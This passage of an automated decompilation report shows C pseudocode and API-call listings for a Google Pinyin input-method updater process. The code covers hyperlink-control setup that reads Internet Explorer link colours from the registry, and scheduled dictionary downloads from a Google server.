                                                                                                                                                                    				signed int _t125;
                                                                                                                                                                    				struct HINSTANCE__* _t130;
                                                                                                                                                                    				int _t131;
                                                                                                                                                                    				long _t149;
                                                                                                                                                                    				intOrPtr _t151;
                                                                                                                                                                    				intOrPtr _t153;
                                                                                                                                                                    				int _t163;
                                                                                                                                                                    				void* _t166;
                                                                                                                                                                    				signed int _t170;
                                                                                                                                                                    				WCHAR* _t171;
                                                                                                                                                                    
                                                                                                                                                                    				_t85 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_v8 = _t85 ^ _t170;
                                                                                                                                                                    				_t168 = __ecx;
                                                                                                                                                                    				_v156 = __ecx;
                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                    				_v46 = 0;
                                                                                                                                                                    				_v42 = 0;
                                                                                                                                                                    				_v38 = 0;
                                                                                                                                                                    				_v34 = 0;
                                                                                                                                                                    				if(GetClassNameW( *(__ecx + 4),  &_v48, 8) != 0 && lstrcmpiW( &_v48, L"static") == 0) {
                                                                                                                                                                    					_t122 = GetWindowLongW(_t168[1], 0xfffffff0);
                                                                                                                                                                    					_t149 = _t122 | 0x00000100;
                                                                                                                                                                    					if(_t122 != _t149) {
                                                                                                                                                                    						SetWindowLongW(_t168[1], 0xfffffff0, _t149);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t125 = GetWindowLongW(_t168[1], 0xfffffff0) & 0x000000ff;
                                                                                                                                                                    					if(_t125 == 3 || _t125 == 4 || _t125 == 5 || _t125 == 6 || _t125 == 7 || _t125 == 8 || _t125 == 9 || _t125 == 0xd || _t125 == 0xe || _t125 == 0xf) {
                                                                                                                                                                    						_t168[0x16] = _t168[0x16] & 0x000000fe;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t168[0xb] = LoadCursorW(0, 0x7f89);
                                                                                                                                                                    				if((_t168[0x16] & 0x00000001) != 0) {
                                                                                                                                                                    					_t114 = SendMessageW(GetParent(_t168[1]), 0x31, 0, 0);
                                                                                                                                                                    					_t168[0xd] = _t114;
                                                                                                                                                                    					if(_t114 == 0) {
                                                                                                                                                                    						_t168[0xd] = GetStockObject(0xd);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t166 = _t168[0xd];
                                                                                                                                                                    					if(_t166 != 0 && _t168[0xc] == 0) {
                                                                                                                                                                    						_v148.lfHeight = 0;
                                                                                                                                                                    						L004F3CE0( &(_v148.lfWidth), 0, 0x58);
                                                                                                                                                                    						_t171 =  &(_t171[6]);
                                                                                                                                                                    						GetObjectW(_t166, 0x5c,  &_v148);
                                                                                                                                                                    						if((_t168[0x15] & 0x00000030) != 0x30) {
                                                                                                                                                                    							__eflags = _t168[0x15] & 0x00000001;
                                                                                                                                                                    							if((_t168[0x15] & 0x00000001) == 0) {
                                                                                                                                                                    								_v148.lfUnderline = 1;
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_v148.lfWeight = 0x2bc;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t118 = CreateFontIndirectW( &_v148);
                                                                                                                                                                    						_t168[0x16] = _t168[0x16] | 0x00000008;
                                                                                                                                                                    						_t168[0xc] = _t118;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t130 =  *0x55e4a4; // 0x0
                                                                                                                                                                    				_t151 =  *0x55abd4; // 0x0
                                                                                                                                                                    				_t131 =  *0x55abc8; // 0x80000000
                                                                                                                                                                    				_t91 =  *0x55abcc; // 0x80000000
                                                                                                                                                                    				_t153 =  *0x55abd0; // 0x0
                                                                                                                                                                    				_t154 = _t153 - _t131;
                                                                                                                                                                    				_t127 =  &(_t168[0x12]);
                                                                                                                                                                    				 *_t127 = CreateWindowExW(0, L"tooltips_class32", 0, 0, _t131, _t91, _t153 - _t131, _t151 - _t91, _t168[1], 0, _t130, 0);
                                                                                                                                                                    				if(_t168[9] == 0) {
                                                                                                                                                                    					_t163 = GetWindowTextLengthW(_t168[1]);
                                                                                                                                                                    					if(_t163 > 0) {
                                                                                                                                                                    						_t43 = _t163 + 2; // 0x2
                                                                                                                                                                    						E004FD190(_t163 + _t43);
                                                                                                                                                                    						_t109 = _t171;
                                                                                                                                                                    						_v152 = _t109;
                                                                                                                                                                    						_t110 = GetWindowTextW(_t168[1], _t109, _t163 + 1);
                                                                                                                                                                    						_t195 = _t110;
                                                                                                                                                                    						if(_t110 != 0) {
                                                                                                                                                                    							L00449880(_t168, _t154, _v152, _t195);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t132 = _t168;
                                                                                                                                                                    				_t93 = E004495F0(_t168, _t154);
                                                                                                                                                                    				_t161 = 0;
                                                                                                                                                                    				if(_t168[0xa] != 0) {
                                                                                                                                                                    					L33:
                                                                                                                                                                    					SendMessageW( *_t127, 0x401, 1, _t161);
                                                                                                                                                                    					 *_t171 = _t168[0xa];
                                                                                                                                                                    					_t155 =  &(_t168[0xe]);
                                                                                                                                                                    					_v152 = _t171;
                                                                                                                                                                    					_t93 = L00448FC0(_t127, _t168[1],  &(_t168[0xe]), _t132);
                                                                                                                                                                    					goto L34;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t155 = _t168[0x15] >> 2;
                                                                                                                                                                    					if((_t168[0x15] >> 0x00000002 & 0x00000001) != 0) {
                                                                                                                                                                    						goto L33;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t142 = _t168[9];
                                                                                                                                                                    					_t198 = _t168[9];
                                                                                                                                                                    					if(_t168[9] != 0) {
                                                                                                                                                                    						_t127 = _t168;
                                                                                                                                                                    						_t93 = L004489F0(_t168, _t142, _t155, _t198);
                                                                                                                                                                    					}
                                                                                                                                                                    					L34:
                                                                                                                                                                    					if((_t168[0x16] & 0x00000001) != 0) {
                                                                                                                                                                    						_push( &_v168);
                                                                                                                                                                    						_t155 = 0x2001f;
                                                                                                                                                                    						_v168 = _t161;
                                                                                                                                                                    						_v164 = _t161;
                                                                                                                                                                    						_v160 = _t161;
                                                                                                                                                                    						_t99 = E00401710(L"Software\\Microsoft\\Internet Explorer\\Settings", 0x80000001, 0x2001f);
                                                                                                                                                                    						if(_t99 == 0) {
                                                                                                                                                                    							_t127 = 0xc;
                                                                                                                                                                    							_v32 = _t99;
                                                                                                                                                                    							_v30 = _t99;
                                                                                                                                                                    							_v26 = _t99;
                                                                                                                                                                    							_v22 = _t99;
                                                                                                                                                                    							_v18 = _t99;
                                                                                                                                                                    							_v14 = _t99;
                                                                                                                                                                    							_v10 = _t99;
                                                                                                                                                                    							_v152 = 0xc;
                                                                                                                                                                    							if(L0040EDA0( &_v152,  &_v32,  &_v168, L"Anchor Color") == 0) {
                                                                                                                                                                    								_t104 = L004499B0( &_v32, _t170);
                                                                                                                                                                    								if(_t104 != 0xffffffff) {
                                                                                                                                                                    									_t155 = _v156;
                                                                                                                                                                    									 *((intOrPtr*)(_v156 + 0x4c)) = _t104;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    							_t161 =  &_v152;
                                                                                                                                                                    							_t168 =  &_v32;
                                                                                                                                                                    							_v152 = _t127;
                                                                                                                                                                    							if(L0040EDA0( &_v152,  &_v32,  &_v168, L"Anchor Color Visited") == 0) {
                                                                                                                                                                    								_t103 = L004499B0( &_v32, _t170);
                                                                                                                                                                    								if(_t103 != 0xffffffff) {
                                                                                                                                                                    									 *((intOrPtr*)(_v156 + 0x50)) = _t103;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_t93 = _v168;
                                                                                                                                                                    						if(_t93 != 0) {
                                                                                                                                                                    							_t93 = RegCloseKey(_t93);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					return L004EEDC9(_t93, _t127, _v8 ^ _t170, _t155, _t161, _t168);
                                                                                                                                                                    				}
                                                                                                                                                                    			}
                                                                                                                                                                    0x00449477
                                                                                                                                                                    0x0044947d
                                                                                                                                                                    0x00449483
                                                                                                                                                                    0x00449489
                                                                                                                                                                    0x0044948b
                                                                                                                                                                    0x00449495
                                                                                                                                                                    0x00449495
                                                                                                                                                                    0x0044948b
                                                                                                                                                                    0x00449469
                                                                                                                                                                    0x0044949a
                                                                                                                                                                    0x0044949c
                                                                                                                                                                    0x004494a1
                                                                                                                                                                    0x004494a6
                                                                                                                                                                    0x004494c3
                                                                                                                                                                    0x004494ce
                                                                                                                                                                    0x004494da
                                                                                                                                                                    0x004494df
                                                                                                                                                                    0x004494e2
                                                                                                                                                                    0x004494e8
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004494a8
                                                                                                                                                                    0x004494ab
                                                                                                                                                                    0x004494b1
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004494b3
                                                                                                                                                                    0x004494b6
                                                                                                                                                                    0x004494b8
                                                                                                                                                                    0x004494ba
                                                                                                                                                                    0x004494bc
                                                                                                                                                                    0x004494bc
                                                                                                                                                                    0x004494ed
                                                                                                                                                                    0x004494f1
                                                                                                                                                                    0x004494fd
                                                                                                                                                                    0x004494fe
                                                                                                                                                                    0x0044950d
                                                                                                                                                                    0x00449513
                                                                                                                                                                    0x00449519
                                                                                                                                                                    0x0044951f
                                                                                                                                                                    0x00449526
                                                                                                                                                                    0x00449537
                                                                                                                                                                    0x00449546
                                                                                                                                                                    0x0044954a
                                                                                                                                                                    0x0044954d
                                                                                                                                                                    0x00449550
                                                                                                                                                                    0x00449553
                                                                                                                                                                    0x00449556
                                                                                                                                                                    0x00449559
                                                                                                                                                                    0x0044955d
                                                                                                                                                                    0x0044956a
                                                                                                                                                                    0x0044956e
                                                                                                                                                                    0x00449576
                                                                                                                                                                    0x00449578
                                                                                                                                                                    0x0044957e
                                                                                                                                                                    0x0044957e
                                                                                                                                                                    0x00449576
                                                                                                                                                                    0x0044958d
                                                                                                                                                                    0x00449593
                                                                                                                                                                    0x00449596
                                                                                                                                                                    0x004495a3
                                                                                                                                                                    0x004495a7
                                                                                                                                                                    0x004495af
                                                                                                                                                                    0x004495b7
                                                                                                                                                                    0x004495b7
                                                                                                                                                                    0x004495af
                                                                                                                                                                    0x004495a3
                                                                                                                                                                    0x004495ba
                                                                                                                                                                    0x004495c2
                                                                                                                                                                    0x004495c5
                                                                                                                                                                    0x004495c5
                                                                                                                                                                    0x004495c2
                                                                                                                                                                    0x004495e1
                                                                                                                                                                    0x004495e1

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetClassNameW.USER32 ref: 004492DB
                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,static), ref: 004492EE
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00449304
                                                                                                                                                                    • SetWindowLongW.USER32 ref: 00449319
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00449325
                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00449369
                                                                                                                                                                    • GetParent.USER32(?), ref: 00449380
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0044938D
                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 0044939C
                                                                                                                                                                    • _memset.LIBCMT ref: 004493C7
                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,00000000), ref: 004493D9
                                                                                                                                                                    • CreateFontIndirectW.GDI32(00000000), ref: 00449404
                                                                                                                                                                    • CreateWindowExW.USER32 ref: 0044944D
                                                                                                                                                                    • GetWindowTextLengthW.USER32(?), ref: 0044945F
                                                                                                                                                                    • GetWindowTextW.USER32 ref: 00449483
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000001,00000000), ref: 004494CE
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 004495C5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$CreateMessageObjectSendText$ClassCloseCursorFontIndirectLengthLoadNameParentStock_memsetlstrcmpi
                                                                                                                                                                    • String ID: Anchor Color$Anchor Color Visited$Software\Microsoft\Internet Explorer\Settings$static$tooltips_class32
                                                                                                                                                                    • API String ID: 2343168553-2451883503
                                                                                                                                                                    • Opcode ID: 11f265fb00d7e04a6ff597a5e279a4bc4d02a675c06db3ce2979f37eaa3db7b3
                                                                                                                                                                    • Instruction ID: c74647114f2b08ac2143696d2b5cd95c1db251ccf2a1da613707913ac255924e
                                                                                                                                                                    • Opcode Fuzzy Hash: 11f265fb00d7e04a6ff597a5e279a4bc4d02a675c06db3ce2979f37eaa3db7b3
                                                                                                                                                                    • Instruction Fuzzy Hash: AEA1CD70A00704AFEB30CF24CC85BABB7B4AF99710F10455EE90AE7290D778AD46DB59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                    			E00404630(void __edx, void* __ebp) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				long _v16;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                    				char _v36;
                                                                                                                                                                    				char _v534;
                                                                                                                                                                    				char _v536;
                                                                                                                                                                    				char _v548;
                                                                                                                                                                    				char _v780;
                                                                                                                                                                    				char _v784;
                                                                                                                                                                    				char _v788;
                                                                                                                                                                    				void _v828;
                                                                                                                                                                    				char _v832;
                                                                                                                                                                    				char _v844;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v848;
                                                                                                                                                                    				char _v852;
                                                                                                                                                                    				short _v864;
                                                                                                                                                                    				char _v868;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v872;
                                                                                                                                                                    				char _v888;
                                                                                                                                                                    				char _v892;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v896;
                                                                                                                                                                    				char _v912;
                                                                                                                                                                    				char _v916;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v920;
                                                                                                                                                                    				char _v936;
                                                                                                                                                                    				void* _v940;
                                                                                                                                                                    				char _v944;
                                                                                                                                                                    				char _v948;
                                                                                                                                                                    				char _v952;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v956;
                                                                                                                                                                    				intOrPtr _v964;
                                                                                                                                                                    				short _v972;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1008;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1012;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1016;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1020;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1024;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1028;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1032;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1036;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1040;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1044;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1048;
                                                                                                                                                                    				char _v1052;
                                                                                                                                                                    				long _v1056;
                                                                                                                                                                    				void* _v1060;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1064;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v1068;
                                                                                                                                                                    				char _v1072;
                                                                                                                                                                    				char _v1092;
                                                                                                                                                                    				char _v1100;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t124;
                                                                                                                                                                    				signed int _t126;
                                                                                                                                                                    				intOrPtr* _t141;
                                                                                                                                                                    				void* _t152;
                                                                                                                                                                    				void* _t154;
                                                                                                                                                                    				void* _t155;
                                                                                                                                                                    				void* _t157;
                                                                                                                                                                    				void* _t160;
                                                                                                                                                                    				void* _t162;
                                                                                                                                                                    				void* _t164;
                                                                                                                                                                    				void* _t167;
                                                                                                                                                                    				void* _t169;
                                                                                                                                                                    				long _t177;
                                                                                                                                                                    				void* _t183;
                                                                                                                                                                    				void* _t184;
                                                                                                                                                                    				void* _t185;
                                                                                                                                                                    				void* _t186;
                                                                                                                                                                    				int _t189;
                                                                                                                                                                    				void* _t197;
                                                                                                                                                                    				void* _t199;
                                                                                                                                                                    				void* _t208;
                                                                                                                                                                    				void* _t209;
                                                                                                                                                                    				void* _t212;
                                                                                                                                                                    				void* _t219;
                                                                                                                                                                    				void* _t230;
                                                                                                                                                                    				void* _t235;
                                                                                                                                                                    				struct _CRITICAL_SECTION* _t239;
                                                                                                                                                                    				void* _t241;
                                                                                                                                                                    				void* _t243;
                                                                                                                                                                    				char* _t248;
                                                                                                                                                                    				void* _t255;
                                                                                                                                                                    				void* _t256;
                                                                                                                                                                    				void* _t257;
                                                                                                                                                                    				signed int _t258;
                                                                                                                                                                    				signed int _t259;
                                                                                                                                                                    				void* _t260;
                                                                                                                                                                    				void* _t261;
                                                                                                                                                                    				void* _t262;
                                                                                                                                                                    				void* _t263;
                                                                                                                                                                    				void* _t264;
                                                                                                                                                                    				void* _t265;
                                                                                                                                                                    				void* _t267;
                                                                                                                                                                    
                                                                                                                                                                    				_t256 = __ebp;
                                                                                                                                                                    				_t227 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x51db1b);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t258 = _t257 - 0x418;
                                                                                                                                                                    				_t124 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_v16 = _t124 ^ _t258;
                                                                                                                                                                    				_push(_t235);
                                                                                                                                                                    				_t126 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t126 ^ _t258);
                                                                                                                                                                    				 *[fs:0x0] =  &_v12;
                                                                                                                                                                    				_t243 = CreateMutexW(0, 1, L"GooglePinyinDaemon2Singleton");
                                                                                                                                                                    				if(_t243 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                    					E00404550(0, _t209, _t227, _t235, _t256, __eflags);
                                                                                                                                                                    					_v536 = 0;
                                                                                                                                                                    					L004F3CE0( &_v534, 0, 0x206);
                                                                                                                                                                    					_t259 = _t258 + 0xc;
                                                                                                                                                                    					L004149B0( &_v536);
                                                                                                                                                                    					_v916 = 7;
                                                                                                                                                                    					_v920 = 0;
                                                                                                                                                                    					_v936 = 0;
                                                                                                                                                                    					E00405450(L"https://clients2.google.com/ime/pinyin/dicts", 0,  &_v936, 0x2c);
                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                    					_v912 = 0;
                                                                                                                                                                    					_v892 = 7;
                                                                                                                                                                    					_v896 = 0;
                                                                                                                                                                    					E00405450(L"dict_index.zip", 0,  &_v912, 0xe);
                                                                                                                                                                    					_v12 = 1;
                                                                                                                                                                    					_v868 = 7;
                                                                                                                                                                    					_v872 = 0;
                                                                                                                                                                    					_v888 = 0;
                                                                                                                                                                    					E00405450(L"dict_index.pb", 0,  &_v888, 0xd);
                                                                                                                                                                    					_v16 = 2;
                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                    					_t141 =  &_v548;
                                                                                                                                                                    					_v864 = 0;
                                                                                                                                                                    					_v844 = 7;
                                                                                                                                                                    					_v848 = 0;
                                                                                                                                                                    					_t230 = _t141 + 2;
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t212 =  *_t141;
                                                                                                                                                                    						_t141 = _t141 + 2;
                                                                                                                                                                    						__eflags = _t212;
                                                                                                                                                                    					} while (_t212 != 0);
                                                                                                                                                                    					E00405450( &_v536, 0,  &_v852, _t141 - _t230 >> 1);
                                                                                                                                                                    					_v8 = 3;
                                                                                                                                                                    					E00438430(_t256, __eflags,  &_v780);
                                                                                                                                                                    					_v12 = 4;
                                                                                                                                                                    					_t248 =  &_v972;
                                                                                                                                                                    					_v952 = 7;
                                                                                                                                                                    					_v956 = 0;
                                                                                                                                                                    					_v972 = 0;
                                                                                                                                                                    					E00405450(L"GooglePinyinItemDownloader", 0, _t248, 0x1a);
                                                                                                                                                                    					_t231 =  &_v788;
                                                                                                                                                                    					_push( &_v788);
                                                                                                                                                                    					_push( &_v832);
                                                                                                                                                                    					_t215 = _t248;
                                                                                                                                                                    					_v16 = 5;
                                                                                                                                                                    					E00404300(_t248, __eflags);
                                                                                                                                                                    					_v24 = 7;
                                                                                                                                                                    					__eflags = _v964 - 8;
                                                                                                                                                                    					if(_v964 >= 8) {
                                                                                                                                                                    						_t215 = _v972;
                                                                                                                                                                    						_push(_v972);
                                                                                                                                                                    						L004EEDBE();
                                                                                                                                                                    						_t259 = _t259 + 4;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t249 =  &_v828;
                                                                                                                                                                    					_t152 = E0043C300( &_v828);
                                                                                                                                                                    					__eflags = _t152;
                                                                                                                                                                    					if(_t152 != 0) {
                                                                                                                                                                    						_t154 = CreateThread(0, 0, 0x404620,  &_v828, 0, 0);
                                                                                                                                                                    						_v1048 = 0;
                                                                                                                                                                    						__eflags = _t154 - 0xffffffff;
                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                    							_v1048 = _t154;
                                                                                                                                                                    						}
                                                                                                                                                                    						_v1044 = 0;
                                                                                                                                                                    						_v1072 = 0x533080;
                                                                                                                                                                    						_v1068 = 0;
                                                                                                                                                                    						_v1064 = 0;
                                                                                                                                                                    						_v1060 = 0;
                                                                                                                                                                    						_v1052 = 0;
                                                                                                                                                                    						_push(8);
                                                                                                                                                                    						_v16 = 0xa;
                                                                                                                                                                    						_t155 = L004EF8DA(0, _t215, _t231, 7, _t249, __eflags);
                                                                                                                                                                    						_t260 = _t259 + 4;
                                                                                                                                                                    						__eflags = _t155;
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							_t155 = 0;
                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							 *_t155 = 0x52fddc;
                                                                                                                                                                    							 *((intOrPtr*)(_t155 + 4)) = E0043B0F0;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t216 =  &_v1072;
                                                                                                                                                                    						E0043A120(0, _t231, __eflags,  &_v1072, 0x2a30, 0x3f480, 0x2a30, _t155);
                                                                                                                                                                    						_push(8);
                                                                                                                                                                    						_t157 = L004EF8DA(0,  &_v1072, _t231, 7, _t249, __eflags);
                                                                                                                                                                    						_t261 = _t260 + 4;
                                                                                                                                                                    						__eflags = _t157;
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							_t157 = 0;
                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                    						} else {
							 *_t157 = 0x52fddc;
							 *((intOrPtr*)(_t157 + 4)) = E0043B560;
						}
						_t232 =  &_v1072;
						E0043A120(0,  &_v1072, __eflags,  &_v1072, 0x15180, 0x3f480, 0x2a30, _t157);
						__eflags = E00411410(_t216,  &_v1072);
						if(__eflags != 0) {
							_push(0xc);
							_t197 = L004EF8DA(0, _t216, _t232, 7, _t249, __eflags);
							_t267 = _t261 + 4;
							__eflags = _t197;
							if(__eflags == 0) {
								_t197 = 0;
								__eflags = 0;
							} else {
								_t216 =  &_v788;
								 *_t197 = 0x52fdf0;
								 *((intOrPtr*)(_t197 + 4)) = E004044C0;
								 *((intOrPtr*)(_t197 + 8)) =  &_v788;
							}
							_t232 =  &_v1072;
							E0043A120(0,  &_v1072, __eflags,  &_v1072, 0xa8c0, 0xa8c0, 0x1c20, _t197);
							_push(0xc);
							_t199 = L004EF8DA(0, _t216,  &_v1072, 7, _t249, __eflags);
							_t261 = _t267 + 4;
							__eflags = _t199;
							if(__eflags == 0) {
								_t199 = 0;
								__eflags = 0;
							} else {
								 *_t199 = 0x52fe04;
								 *((intOrPtr*)(_t199 + 4)) = 0x43b9d0;
								 *((char*)(_t199 + 8)) = 0;
							}
							E0043A120(0, _t232, __eflags,  &_v1072, 0x1c20, 0x15180, 0x1c20, _t199);
						}
						_push(0xc);
						_t160 = L004EF8DA(0, _t216, _t232, 7, _t249, __eflags);
						_t262 = _t261 + 4;
						__eflags = _t160;
						if(__eflags == 0) {
							_t160 = 0;
							__eflags = 0;
						} else {
							 *_t160 = 0x52fe04;
							 *((intOrPtr*)(_t160 + 4)) =  &M0043B910;
							 *((char*)(_t160 + 8)) = 0;
						}
						_t217 =  &_v1072;
						E0043A120(0, _t232, __eflags,  &_v1072, 0x1c20, 0x15180, 0x1c20, _t160);
						_push(0xc);
						_t162 = L004EF8DA(0,  &_v1072, _t232, 7, _t249, __eflags);
						_t263 = _t262 + 4;
						__eflags = _t162;
						if(__eflags == 0) {
							_t162 = 0;
							__eflags = 0;
						} else {
							 *_t162 = 0x52fe04;
							 *((intOrPtr*)(_t162 + 4)) = 0x43b790;
							 *((char*)(_t162 + 8)) = 0;
						}
						_t233 =  &_v1072;
						E0043A120(0,  &_v1072, __eflags,  &_v1072, 0x1c20, 0x15180, 0x1c20, _t162);
						_push(8);
						_t164 = L004EF8DA(0, _t217,  &_v1072, 7, _t249, __eflags);
						_t264 = _t263 + 4;
						__eflags = _t164;
						if(__eflags == 0) {
							_t164 = 0;
							__eflags = 0;
						} else {
							 *_t164 = 0x52fddc;
							 *((intOrPtr*)(_t164 + 4)) = E00404430;
						}
						E0043A120(0, _t233, __eflags,  &_v1072, 0xf, 0xf, 0, _t164);
						_push(0xc);
						_t167 = L004EF8DA(0, _t217, _t233, 7, _t249, __eflags);
						_t265 = _t264 + 4;
						__eflags = _t167;
						if(__eflags == 0) {
							_t167 = 0;
							__eflags = 0;
						} else {
							_t217 =  &_v1044;
							 *_t167 = 0x52fe18;
							 *((intOrPtr*)(_t167 + 4)) =  &_v1044;
							 *((intOrPtr*)(_t167 + 8)) = E0043C6B0;
						}
						_t234 =  &_v1072;
						E0043A120(0,  &_v1072, __eflags,  &_v1072, 0xe10, 0xe10, 0, _t167);
						_push(8);
						_t169 = L004EF8DA(0, _t217,  &_v1072, 7, _t249, __eflags);
						_t259 = _t265 + 4;
						__eflags = _t169;
						if(__eflags == 0) {
							_t169 = 0;
							__eflags = 0;
						} else {
							 *_t169 = 0x52fddc;
							 *((intOrPtr*)(_t169 + 4)) = E0043A500;
						}
						E0043A120(0, _t234, __eflags,  &_v1072, 0x15180, 0x15180, 0, _t169);
						E0043A200( &_v1092);
						SetProcessWorkingSetSize(GetCurrentProcess(), 0xffffffff, 0xffffffff);
						SetPriorityClass(GetCurrentProcess(), 0x40);
						_v1052 = 0x52fd50;
						_v1048 = 0;
						_v1044 = 0;
						_v1040 = 0;
						_v1036 = 0;
						_v1032 = 0;
						_v1028 = 0;
						_v36 = 0xb;
						_t239 =  *0x55f60c + 0x10;
						_v1060 =  &_v1052;
						EnterCriticalSection(_t239);
						_t177 = GetCurrentThreadId();
						_t227 =  &_v1060;
						_v1056 = _t177;
						L00404EB0( *0x55fd14, __eflags,  &_v1056,  &_v1060);
						LeaveCriticalSection(_t239);
						_t240 =  &_v1060;
						L00403BF0( &_v1060);
						L00403E60();
						E0043A2D0( &_v1100);
						_t183 = _v1044;
						__eflags = _t183;
						if(_t183 != 0) {
							E004EF421(_t183);
							_t259 = _t259 + 4;
							_v1016 = 0;
						}
						_t184 = _v1028;
						_v1012 = 0;
						_v1008 = 0;
						__eflags = _t184;
						if(_t184 != 0) {
							E004EF421(_t184);
							_t259 = _t259 + 4;
							_v1028 = 0;
						}
						_v16 = 9;
						_t185 = _v1068;
						_v1024 = 0;
						_v1020 = 0;
						_v1072 = 0x533080;
						__eflags = _t185;
						if(_t185 != 0) {
							_push(_t185);
							L004EEDBE();
							_t259 = _t259 + 4;
						}
						_v16 = 8;
						_t219 = _v1044;
						_v1068 = 0;
						_v1064 = 0;
						_v1060 = 0;
						__eflags = _t219;
						if(_t219 != 0) {
							_t227 =  *_t219;
							 *((intOrPtr*)( *( *_t219)))(1);
						}
						_t186 = _v1048;
						__eflags = _t186;
						if(_t186 != 0) {
							CloseHandle(_t186);
						}
						_v16 = 4;
						E0043C390(_t240,  &_v832);
						_v16 = 3;
						E00438560( &_v788);
						_push( &_v948);
					} else {
						_v12 = 4;
						E0043C390(7,  &_v828);
						_v12 = 3;
						E00438560( &_v784);
						_t227 =  &_v944;
						_push( &_v944);
					}
					_v16 = 0xffffffff;
					_t189 = L00404C70();
				} else {
					_t189 = CloseHandle(_t243);
				}
				 *[fs:0x0] = _v24;
				_pop(_t241);
				_pop(_t255);
                                                                                                                                                                    				_pop(_t208);
                                                                                                                                                                    				return L004EEDC9(_t189, _t208, _v28 ^ _t259, _t227, _t241, _t255);
                                                                                                                                                                    			}





































































































                                                                                                                                                                    0x00404a49
                                                                                                                                                                    0x00404a5f
                                                                                                                                                                    0x00404a64
                                                                                                                                                                    0x00404a66
